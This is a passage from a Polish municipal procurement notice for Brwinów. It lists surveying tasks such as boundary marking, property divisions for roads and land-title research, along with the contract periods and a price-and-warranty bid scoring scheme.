Usługi kartograficzne w zakresie obszarów wiejskich</p> <p class="mb-0">71354000-4 - Usługi sporządzania map</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób obliczenia wartości punktowej oferty.<br/><br/>1) Wartość punktowa kryterium nr 1) – „cena” obliczona według wzoru: <br/>Cena najniższa / cena oferty badanej x 100 x 40 %<br/><br/>2) Wartość punktowa kryterium nr 2) – „okres udzielonej rękojmi za wady”: <br/>Okres rękojmi oferty badanej/ najdłuższy zaoferowany okres rękojmi x 100 x 60 %<br/><br/>UWAGA: Minimalny okres rękojmi za wady 36 miesięcy (3 lata). Maksymalny okres rękojmi za wady 72 miesiące (6 lat). W przypadku udzielenia rękojmi za wady na okres krótszy niż 36 miesięcy <br/>(3 lata), oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust 1 pkt 5 ustawy, jako niezgodna z warunkami zamówienia (SWZ.)<br/>Przy okresie gwarancji dłuższym niż 72 miesiące dla celów przyznania punktacji w niniejszym kryterium zostanie przyjęta wartość 72 miesiące, natomiast do umowy zostanie wstawiony okres oferowany.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2<br/>Zadanie 1. Wykonanie wykazu zmian gruntowych w celu zmiany użytków gruntowych wykazanych w operacie ewidencji gruntów i budynków dla 20 działek.<br/>W ramach zadania należy wykonać wykaz zmian gruntowych. Opracowania będą wykonywane na podstawie zleceń wystawianych przez Referat Gospodarki Nieruchomościami, w miarę zaistniałych potrzeb. Termin wykonania opracowania w ciągu 1 miesiąca od dnia odebrania zlecenia. <br/><br/>Zadanie 2. Wykonanie 5 wykazów zmian gruntowych w celu połączenia działek ewidencyjnych w jedną działkę ewidencyjną.<br/>W ramach zadania należy wykonać wykaz zmian gruntowych, <br/>Opracowania będą wykonywane na podstawie zleceń wystawianych przez Referat Gospodarki Nieruchomościami, w miarę zaistniałych potrzeb. Termin wykonania opracowania w ciągu 1 miesiąca od dnia odebrania zlecenia. <br/><br/>Zadanie 3. Wyznaczenie punktów granicznych działek położonych na terenie Gminy Brwinów. <br/>W okresie obowiązywania umowy przewiduje się wyznaczenie ok. 40 punktów.<br/>W ramach zadania należy wykonać okazanie granic działki wraz z oznaczeniem punktów granicznych prętem metalowym. Opracowania będą wykonywane na podstawie zleceń wystawianych przez Referat Gospodarki Nieruchomościami, w miarę zaistniałych potrzeb. Termin wykonania opracowania w ciągu 2 miesięcy od dnia odebrania zlecenia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71222100-1 - Usługi kartograficzne w zakresie obszarów miejskich</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71222200-2 - Usługi kartograficzne w zakresie obszarów wiejskich</p> <p class="mb-0">71354000-4 - Usługi sporządzania map</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób obliczenia wartości punktowej oferty.<br/><br/>1) Wartość punktowa kryterium nr 1) – „cena” obliczona według wzoru: <br/>Cena najniższa / cena oferty badanej x 100 x 40 %<br/><br/>2) Wartość punktowa kryterium nr 2) – „okres udzielonej rękojmi za wady”: <br/>Okres rękojmi oferty badanej/ najdłuższy zaoferowany okres rękojmi x 100 x 60 %<br/><br/>UWAGA: Minimalny okres rękojmi za wady 36 miesięcy (3 lata). Maksymalny okres rękojmi za wady 72 miesiące (6 lat). W przypadku udzielenia rękojmi za wady na okres krótszy niż 36 miesięcy <br/>(3 lata), oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust 1 pkt 5 ustawy, jako niezgodna z warunkami zamówienia (SWZ.)<br/>Przy okresie gwarancji dłuższym niż 72 miesiące dla celów przyznania punktacji w niniejszym kryterium zostanie przyjęta wartość 72 miesiące, natomiast do umowy zostanie wstawiony okres oferowany.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3<br/>Zadanie 1. Wyznaczenie punktów granicznych działki 82/11 położonej w miejscowości Parzniew gm. Brwinów (część ulicy Strusia).<br/>W ramach zadania należy wykonać okazanie granic działki wraz z oznaczeniem punktów granicznych prętem metalowym.<br/><br/>Zadanie 2. Wyznaczenie punktów granicznych działki 110 położonej w miejscowości<br/>Krosna Wieś gm. Brwinów (część ulicy Nadrzecznej) na odcinku - granica z działką nr ew. 109.<br/>W ramach zadania należy wykonać okazanie granic działki wraz z oznaczeniem punktów granicznych prętem metalowym.<br/><br/>Zadanie 3. Wykonanie wykazu zmian danych ewidencyjnych mającego na celu wykreślenie budynku z ewidencji gruntów- działka nr ew. 82/11 obr. Parzniew gm. Brwinów.<br/>W ramach zadania należy wykonać wykaz zmian danych ewidencyjnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71222100-1 - Usługi kartograficzne w zakresie obszarów miejskich</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71222200-2 - Usługi kartograficzne w zakresie obszarów wiejskich</p> <p class="mb-0">71354000-4 - Usługi sporządzania map</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób obliczenia wartości punktowej oferty.<br/><br/>1) Wartość punktowa kryterium nr 1) – „cena” obliczona według wzoru: <br/>Cena najniższa / cena oferty badanej x 100 x 40 %<br/><br/>2) Wartość punktowa kryterium nr 2) – „okres udzielonej rękojmi za wady”: <br/>Okres rękojmi oferty badanej/ najdłuższy zaoferowany okres rękojmi x 100 x 60 %<br/><br/>UWAGA: Minimalny okres rękojmi za wady 36 miesięcy (3 lata). Maksymalny okres rękojmi za wady 72 miesiące (6 lat). W przypadku udzielenia rękojmi za wady na okres krótszy niż 36 miesięcy <br/>(3 lata), oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust 1 pkt 5 ustawy, jako niezgodna z warunkami zamówienia (SWZ.)<br/>Przy okresie gwarancji dłuższym niż 72 miesiące dla celów przyznania punktacji w niniejszym kryterium zostanie przyjęta wartość 72 miesiące, natomiast do umowy zostanie wstawiony okres oferowany.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4<br/>Zadanie 1. Wstępny projekt podziału nieruchomości oznaczonej w ewidencji gruntów jako działka nr 3/22 obr. 4 m. Brwinów, położonej w miejscowości Brwinów, zgodnie z załącznikiem mapowym.<br/>Zadanie 2. Wstępny projekt podziału nieruchomości oznaczonych w ewidencji gruntów jako działki nr 222/5, 222/6, 222/7 obr. 6 miasta Brwinów z powierzchniami wyliczonymi w oparciu o współrzędne punktów granicznych. Podział ma na celu wydzielenie gruntu pod drogi17 KDD, 18 KDD, 19 KDL, zgodnie z miejscowym planem zagospodarowania przestrzennego.<br/>Zadanie 3. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 129/6, położonej w miejscowości Owczarnia gm. Brwinów, zgodnie z miejscowym planem zagospodarowania przestrzennego w celu wydzielenia gruntu w obrębie skrzyżowaniaul. Kazimierzowskiej i Żółwińskiej (zgodnie z załącznikiem mapowym).<br/>Zadanie 4. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 353/1 położonej w miejscowości Kanie gm. Brwinów w celu wydzielenia gruntu znajdującego się poza ogrodzeniem (zgodnie z załącznikiem mapowym). <br/>Zadanie 5. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 353/2 położonej w miejscowości Kanie gm. Brwinów w celu wydzielenia gruntu znajdującego się poza ogrodzeniem (zgodnie z załącznikiem mapowym). <br/>Zadanie 6. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 447 obr. Żółwin gm. Brwinów, polegający na wydzieleniu poszerzenia ul. Granicznej, zgodnie z postanowieniem Burmistrza Gminy Brwinów i wstępnym projektem podziału.<br/>Zadanie 7. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 448 obr. Żółwin gm. Brwinów, polegający na wydzieleniu poszerzenia ul. Granicznej, zgodnie z postanowieniem Burmistrza Gminy Brwinów i wstępnym projektem podziału.<br/>Zadanie 8. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 2/1 obr. Terenia gm. Brwinów, zgodnie z postanowieniem Burmistrza Gminy Brwinów i wstępnym projektem podziału.<br/>Zadanie 9. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 5/4 obr. Terenia gm. Brwinów, zgodnie z postanowieniem Burmistrza Gminy Brwinów i wstępnym projektem podziału.<br/>Zadanie 10. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 41/1 obr. Terenia gm. Brwinów, zgodnie z postanowieniem Burmistrza Gminy Brwinów i wstępnym projektem podziału.<br/>Zadanie 11. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 39/5 obr. Terenia gm. Brwinów, zgodnie z postanowieniem Burmistrza Gminy Brwinów i wstępnym projektem podziału.<br/>Zadanie 12. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 41/4 obr. Terenia gm. Brwinów, zgodnie z postanowieniem Burmistrza Gminy Brwinów i wstępnym projektem podziału.<br/>W ramach zadania 1 - 2 należy wykonać:<br/>- 3 egz. mapy ze wstępnym projektem podziału <br/>W ramach zadania 3 - 5 należy wykonać:<br/>- 3 egz. mapy ze wstępnym projektem podziału <br/>- 5 egz. mapy z projektowanym podziałem, opatrzonych pieczęcią poświadczającą przyjęcie do ewidencji materiałów państwowego zasobu geodezyjnego i kartograficznego Starostwa Powiatowego w Pruszkowie dla każdego zadania,<br/>- okazanie granic wydzielonych działek wraz z oznaczeniem punktów granicznych prętem metalowym dla każdego zadania. <br/>W ramach zadania 6 - 12 należy wykonać:<br/>- 5 egz. mapy z projektowanym podziałem, opatrzonych pieczęcią poświadczającą przyjęcie do ewidencji materiałów państwowego zasobu geodezyjnego i kartograficznego Starostwa Powiatowego w Pruszkowie dla każdego zadania,<br/>- okazanie granic wydzielonych działek wraz z oznaczeniem punktów granicznych prętem metalowym dla każdego zadania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71222100-1 - Usługi kartograficzne w zakresie obszarów miejskich</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71222200-2 - Usługi kartograficzne w zakresie obszarów wiejskich</p> <p class="mb-0">71354000-4 - Usługi sporządzania map</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób obliczenia wartości punktowej oferty.<br/><br/>1) Wartość punktowa kryterium nr 1) – „cena” obliczona według wzoru: <br/>Cena najniższa / cena oferty badanej x 100 x 40 %<br/><br/>2) Wartość punktowa kryterium nr 2) – „okres udzielonej rękojmi za wady”: <br/>Okres rękojmi oferty badanej/ najdłuższy zaoferowany okres rękojmi x 100 x 60 %<br/><br/>UWAGA: Minimalny okres rękojmi za wady 36 miesięcy (3 lata). Maksymalny okres rękojmi za wady 72 miesiące (6 lat). W przypadku udzielenia rękojmi za wady na okres krótszy niż 36 miesięcy <br/>(3 lata), oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust 1 pkt 5 ustawy, jako niezgodna z warunkami zamówienia (SWZ.)<br/>Przy okresie gwarancji dłuższym niż 72 miesiące dla celów przyznania punktacji w niniejszym kryterium zostanie przyjęta wartość 72 miesiące, natomiast do umowy zostanie wstawiony okres oferowany.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5<br/>Zadanie 1. Rozgraniczenie nieruchomości położonej w miejscowości Owczarnia, oznaczonej <br/>w ewidencji gruntów jako działka nr 196/2 z nieruchomościami sąsiednimi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71222100-1 - Usługi kartograficzne w zakresie obszarów miejskich</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71222200-2 - Usługi kartograficzne w zakresie obszarów wiejskich</p> <p class="mb-0">71354000-4 - Usługi sporządzania map</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób obliczenia wartości punktowej oferty.<br/><br/>1) Wartość punktowa kryterium nr 1) – „cena” obliczona według wzoru: <br/>Cena najniższa / cena oferty badanej x 100 x 40 %<br/><br/>2) Wartość punktowa kryterium nr 2) – „okres udzielonej rękojmi za wady”: <br/>Okres rękojmi oferty badanej/ najdłuższy zaoferowany okres rękojmi x 100 x 60 %<br/><br/>UWAGA: Minimalny okres rękojmi za wady 36 miesięcy (3 lata). Maksymalny okres rękojmi za wady 72 miesiące (6 lat). W przypadku udzielenia rękojmi za wady na okres krótszy niż 36 miesięcy <br/>(3 lata), oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust 1 pkt 5 ustawy, jako niezgodna z warunkami zamówienia (SWZ.)<br/>Przy okresie gwarancji dłuższym niż 72 miesiące dla celów przyznania punktacji w niniejszym kryterium zostanie przyjęta wartość 72 miesiące, natomiast do umowy zostanie wstawiony okres oferowany.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 6 <br/>Zadanie 1. Analiza geodezyjno-prawna zawierająca rozliczenie hipotek wchodzących w skład działek oznaczonych nr ew. 13/1 i nr ew. 13/3 położonych w miejscowości Kotowice gm. Brwinów lub wykazanie, że wymienione działki stanowią grunt niehipotekowany, w celu ustalenia możliwości regulacji stanu prawnego na rzecz Gminy Brwinów w oparciu o przepis art. 7 ustawy z dnia 10 maja 1990 r. Przepisy wprowadzające ustawę o samorządzie terytorialnym i ustawę o pracownikach samorządowych. <br/>W ramach zadania należy wykonać:<br/>- sprawozdanie z badań hipotecznych – 2 egzemplarze<br/>- szkic działek z zaznaczonym zasięgiem wchodzących w ich skład hipotek lub zawierającego oświadczenie, że w wyniku przeprowadzonych badań hipotecznych nie stwierdzono istnienia księgi wieczystej, hipotecznej, zbioru dokumentów ani innego przewidzianego prawem dokumentu, z którego wynikałby tytuł własności do przedmiotowych działek. <br/><br/>Zadanie 2. Opracowanie geodezyjno-prawne polegające na odnalezieniu tytułu własności Skarbu Państwa dla części nieruchomości położonej przy ul. J. Słowackiego w Kaniach gm. Brwinów, oznaczonej jako działka ewidencyjna nr 657 oraz sporządzeniu mapy prawnej zawierającej rozliczenie gruntu objętego tym tytułem oraz pozostałego, stanowiącego własność osób fizycznych – w celu regulacji stanu prawnego gruntu, w trybie art. 5.1 ustawy z dnia z dnia 10.05.1990 r. – Przepisy wprowadzające ustawę o samorządzie terytorialnym i ustawę o pracownikach samorządowych. <br/>W ramach zadania należy wykonać:<br/>- 5 egz. mapy z wydzieleniem gruntu stanowiącego własność Skarbu Państwa, opatrzonych pieczęcią poświadczającą przyjęcie do ewidencji materiałów państwowego zasobu geodezyjnego i kartograficznego Starostwa Powiatowego w Pruszkowie,<br/>- okazanie granic wydzielonych działek wraz z oznaczeniem punktów granicznych,<br/>- wykaz synchronizacyjny, w przypadku innych oznaczeń w ewidencji gruntów niż w księdze wieczystej.<br/><br/>Zadanie 3. Analiza geodezyjno-prawna zawierająca odnalezienie tytułu własności dla nieruchomości położonej w Żółwinie gm. Brwinów, oznaczonej jako działka nr ew. 58/2 lub wykazanie, że nieruchomość stanowi grunt niehipotekowany, w celu ustalenia trybu regulacji stanu prawnego nieruchomości na rzecz Gminy Brwinów. <br/>W ramach zadania należy wykonać:<br/>- sprawozdanie z badań hipotecznych – 2 egzemplarze<br/>- szkic działki z wykazaniem tytułu własności lub zaznaczeniem, że grunt jest niehipotekowany,<br/>- pozyskanie dokumentu stanowiącego tytuł własności nieruchomości, zawierającego pieczęć właściwego zasobu archiwalnego lub oświadczenie, że w wyniku przeprowadzonych badań hipotecznych nie stwierdzono istnienia księgi wieczystej, hipotecznej, zbioru dokumentów ani innego przewidzianego prawem dokumentu, z którego wynikałby tytuł własności do przedmiotowych działek. <br/><br/>Zadanie 4. Wykaz synchronizacyjny zawierający rozliczenie działki hipotecznej nr 111 uregulowanej w księdze wieczystej nr WA1P/00062740/8, której część stanowi działka nr ew. 328/4 z obrębu Kanie gm. Brwinów, w celu dokonania zmiany w księdze wieczystej. <br/>W ramach zadania należy wykonać:<br/>- wykaz synchronizacyjny – 2 egzemplarze<br/><br/>Zadanie 5. Wykonanie opracowania geodezyjno-prawnego dla dawnego majątku ziemskiego położonego na terenie miejscowości Otrębusy gm. Brwinów „Osada Zosin A” zawierającego rozliczenie gruntów uregulowanych w zbiorze dokumentów Zd 7102, w szczególności stanowiących własność Skarbu Państwa i podlegających komunalizacji, w celu założenia księgi wieczystej oraz regulacji stanu prawnego nieruchomości na rzecz Gminy w trybie art. 5.1 ustawy z dnia 10.05.1990 r. – Przepisy wprowadzające ustawę o samorządzie terytorialnym i ustawę o pracownikach samorządowych.<br/>W ramach zadania należy wykonać:<br/>- pozyskanie dokumentu stanowiącego odbitkę archiwalnej mapy, na której został wykazany zasięg terytorialny dawnego majątku, zawierającego pieczęć właściwego zasobu archiwalnego;<br/>- pozyskanie dokumentu stanowiącego tytuł własności Skarbu Państwa, zawierającego pieczęć właściwego zasobu archiwalnego;<br/>- sporządzenie mapy prawnej wraz z wykazem zmian gruntowych, stanowiącej rozliczenie gruntu objętego tytułem własności Skarbu Państwa, a do których Gminie Brwinów przysługuje tytuł własności, w celu wprowadzenia zmian w rejestrze ewidencji gruntów, założenia ksiąg wieczystych, a następnie regulacji stanu prawnego nieruchomości w trybie art. 5.1 ustawy z dnia 10.05.1990 r. – Przepisy wprowadzające ustawę o samorządzie terytorialnym i ustawę o pracownikach samorządowych; dokumentacja w 3 egzemplarzach z pieczęciami przyjęcia do zasobu geodezyjnego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71222100-1 - Usługi kartograficzne w zakresie obszarów miejskich</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71222200-2 - Usługi kartograficzne w zakresie obszarów wiejskich</p> <p class="mb-0">71354000-4 - Usługi sporządzania map</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób obliczenia wartości punktowej oferty.<br/><br/>1) Wartość punktowa kryterium nr 1) – „cena” obliczona według wzoru: <br/>Cena najniższa / cena oferty badanej x 100 x 40 %<br/><br/>2) Wartość punktowa kryterium nr 2) – „okres udzielonej rękojmi za wady”: <br/>Okres rękojmi oferty badanej/ najdłuższy zaoferowany okres rękojmi x 100 x 60 %<br/><br/>UWAGA: Minimalny okres rękojmi za wady 36 miesięcy (3 lata). Maksymalny okres rękojmi za wady 72 miesiące (6 lat). W przypadku udzielenia rękojmi za wady na okres krótszy niż 36 miesięcy <br/>(3 lata), oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust 1 pkt 5 ustawy, jako niezgodna z warunkami zamówienia (SWZ.)<br/>Przy okresie gwarancji dłuższym niż 72 miesiące dla celów przyznania punktacji w niniejszym kryterium zostanie przyjęta wartość 72 miesiące, natomiast do umowy zostanie wstawiony okres oferowany.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielonej rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 7<br/>Zadanie 1. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 156/1 obr. Falęcin gm. Brwinów mający na celu wydzielenie drogi publicznej, oznaczonej w miejscowym planie zagospodarowania przestrzennego symbolem – 17KDL<br/>Zadanie 2. Podział nieruchomości oznaczonej w ewidencji gruntów jako działki nr 125 i 158 obr. Falęcin gm. Brwinów mający na celu wydzielenie drogi publicznej, oznaczonej w miejscowym planie zagospodarowania przestrzennego symbolem – 17KDL<br/>Zadanie 3. Podział nieruchomości oznaczonej w ewidencji gruntów jako działki nr 126 i 159 obr. Falęcin gm. Brwinów mający na celu wydzielenie drogi publicznej, oznaczonej w miejscowym planie zagospodarowania przestrzennego symbolem – 17KDL<br/>Zadanie 4. Podział nieruchomości oznaczonej w ewidencji gruntów jako działki nr 127 i 160 obr. Falęcin gm. Brwinów mający na celu wydzielenie drogi publicznej, oznaczonej w miejscowym planie zagospodarowania przestrzennego symbolem – 17KDL<br/>Zadanie 5. Podział nieruchomości oznaczonej w ewidencji gruntów jako działka nr 161 obr. Falęcin 